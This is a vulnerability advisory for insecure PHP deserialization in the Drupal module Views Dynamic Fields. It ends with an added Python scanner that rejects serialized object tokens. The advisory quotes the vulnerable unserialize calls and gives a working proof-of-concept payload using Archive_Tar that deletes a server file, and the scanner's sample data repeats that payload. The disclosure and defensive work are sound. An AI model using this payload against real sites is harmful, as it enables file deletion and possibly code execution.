Note: This description will also be posted on the Full Disclosure mailing list.
Drupal module - Views Dynamic Fields - insecure deserialization
═════════════════════════════════════════════════════════════════
Product: Views Dynamic Fields
Version: <=7.x-1.0-alpha4
URL: [https://www.drupal.org/project/views_dynamic_fields]
CVSS v3: 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
The Drupal module "Views Dynamic Fields", which allows the fields
presented in a view to be specified dynamically, allows a remote
attacker to inject an arbitrary PHP object, which is then
unserialized. The vulnerable code is in the file
handlers/views_handler_filter_dynamic_fields.inc:
┌────
│ $ grep -C3 -n 'unserialize' handlers/views_handler_filter_dynamic_fields.inc
│
│ 278- = $exposed_input[$this->options['expose']['identifier']];
│ 279- $exposed_field_names
│ 280- = isset($exposed_input['field_names'])
│ 281: ? unserialize($exposed_input['field_names']) : $field_names;
│ 282- }
│ 283- $this->options['expose']['multiple'] = $this->options['checkboxes'];
│ 284-
│ --
│ 480-
│ 481- // Exclude these fields.
│ 482- $combined_fields = isset($exposed_input['combined'])
│ 483: ? unserialize($exposed_input['combined']) : array();
│ 484- if (!$this->options['checkboxes']) {
│ 485- $this
│ 486- ->pre_query_single($exposed_input, $field_names, $combined_fields);
│ --
│ 564-
│ 565- // Fields displayed in the filter.
│ 566- $form_field_names = isset($exposed_input['field_names'])
│ 567: ? unserialize($exposed_input['field_names']) : $field_names;
│ 568- $orig_field_exposed = $order_includes = $order_excludes = array();
│ 569- foreach ($exposed_input_fields as $id => $info) {
│ 570- $orig_field_exposed[$info['sort']] = $form_field_names[$id];
└────
This can lead to a range of attack vectors. As a proof of concept, the
field_names array can be given an instance of Drupal's Archive_Tar
class, whose destructor deletes the file on the server named by its
_temp_tarname property. The relevant Archive_Tar code in Drupal:
┌────
│ public function __destruct()
│ {
│     $this->_close();
│     // ----- Look for a local copy to delete
│     if ($this->_temp_tarname != '') {
│         @drupal_unlink($this->_temp_tarname);
│     }
│ }
└────
Thus, supplying an object of type Archive_Tar in the field_names POST
array variable triggers arbitrary file deletion. For example, the
following value of field_names:
┌────
│ a:1:{i:0;O:11:"Archive_Tar":1:{s:13:"_temp_tarname";s:9:"/tmp/test";}}
└────
Deletes the /tmp/test file on the server.
Depending on which classes are loaded, this could be exploited in many
other ways, in some cases even leading to code execution.
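As an added defensive example (not part of the advisory and not the module's code): in PHP the direct fix is to stop passing serialized data through exposed form input altogether, or at minimum to call `unserialize($s, ['allowed_classes' => false])` (PHP 7 and later) so that no class named in the input is instantiated. The Python script below models that allowlist as a small parser for PHP's serialize() format that accepts only null, bool, int, float, string and array, and fails closed on any `O:`/`C:` token, reporting the class name. Run over captured exposed-filter POST parameters it flags payloads like the one quoted above. The parameter names, the `combined` value and `items_per_page` are constructed for the example; the field_names value is the proof-of-concept payload from the advisory.

```python
"""Fail-closed parser for PHP serialize() output (added example, not the module's code).

PHP's unserialize() instantiates any class named in an O:/C: token, which is what lets
the Archive_Tar payload reach __destruct(). This parser refuses such tokens instead.
"""
import re

# Object tokens as emitted by PHP: O:<len>:"<Class>":<n>:{...} or C:<len>:"<Class>":<len>:{...}
OBJECT_TOKEN = re.compile(rb'[OC]:\d+:"([^"]*)"')


class UnsafePayload(ValueError):
    """The serialized value contains a PHP object token."""

    def __init__(self, class_name, offset):
        super().__init__(f"object token for class {class_name!r} at offset {offset}")
        self.class_name = class_name
        self.offset = offset


def _expect(s, i, token):
    """Consume the literal `token` at offset i or fail."""
    if s[i:i + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {i}")
    return i + len(token)


def _parse(s, i):
    """Parse one value starting at offset i; return (value, next_offset)."""
    tag = s[i:i + 1]
    if tag == b'N':                                   # N;
        return None, _expect(s, i + 1, b';')
    if tag in (b'b', b'i', b'd'):                     # b:1;  i:42;  d:0.5;
        i = _expect(s, i + 1, b':')
        end = s.index(b';', i)
        raw = s[i:end].decode('ascii')
        conv = {b'b': lambda r: r == '1', b'i': int, b'd': float}[tag]
        return conv(raw), end + 1
    if tag == b's':                                   # s:<bytes>:"<data>";
        i = _expect(s, i + 1, b':')
        colon = s.index(b':', i)
        length = int(s[i:colon])                      # PHP counts bytes, not characters
        i = _expect(s, colon, b':"')
        data = s[i:i + length]
        i = _expect(s, i + length, b'";')
        return data.decode('utf-8', errors='replace'), i
    if tag == b'a':                                   # a:<count>:{<key><value>...}
        i = _expect(s, i + 1, b':')
        colon = s.index(b':', i)
        count = int(s[i:colon])
        i = _expect(s, colon, b':{')
        result = {}
        for _ in range(count):
            key, i = _parse(s, i)
            if not isinstance(key, (int, str)):
                raise ValueError(f"array key must be int or string at offset {i}")
            value, i = _parse(s, i)
            result[key] = value
        return result, _expect(s, i, b'}')
    if tag in (b'O', b'C'):                           # object: refuse, but report the class
        m = OBJECT_TOKEN.match(s, i)
        class_name = m.group(1).decode('utf-8', errors='replace') if m else '?'
        raise UnsafePayload(class_name, i)
    raise ValueError(f"unknown type tag {tag!r} at offset {i}")


def php_unserialize_safe(data):
    """Decode PHP serialize() output that contains only scalars and arrays."""
    if isinstance(data, str):
        data = data.encode('utf-8')
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError(f"trailing data after offset {end}")
    return value


def scan_exposed_input(params):
    """Return {param_name: class_name} for each parameter carrying a PHP object token.

    Values that are not serialized at all (plain strings, numbers) are ignored.
    """
    findings = {}
    for name, raw in params.items():
        try:
            php_unserialize_safe(raw)
        except UnsafePayload as exc:
            findings[name] = exc.class_name
        except ValueError:
            pass
    return findings


# Constructed sample of an exposed-filter POST; field_names is the PoC value from the advisory.
SAMPLE_POST = {
    'field_names': 'a:1:{i:0;O:11:"Archive_Tar":1:{s:13:"_temp_tarname";s:9:"/tmp/test";}}',
    'combined': 'a:2:{i:0;s:5:"title";i:1;s:4:"body";}',
    'items_per_page': '10',
}

if __name__ == '__main__':
    print(scan_exposed_input(SAMPLE_POST))  # {'field_names': 'Archive_Tar'}
```

Because the parser walks the structure rather than grepping for `O:`, a string value that merely contains the text `O:11:"Archive_Tar"` inside an `s:` token is not flagged, while an object nested anywhere inside an array is. Switching the module to JSON for field_names and combined would remove the class instantiation path entirely.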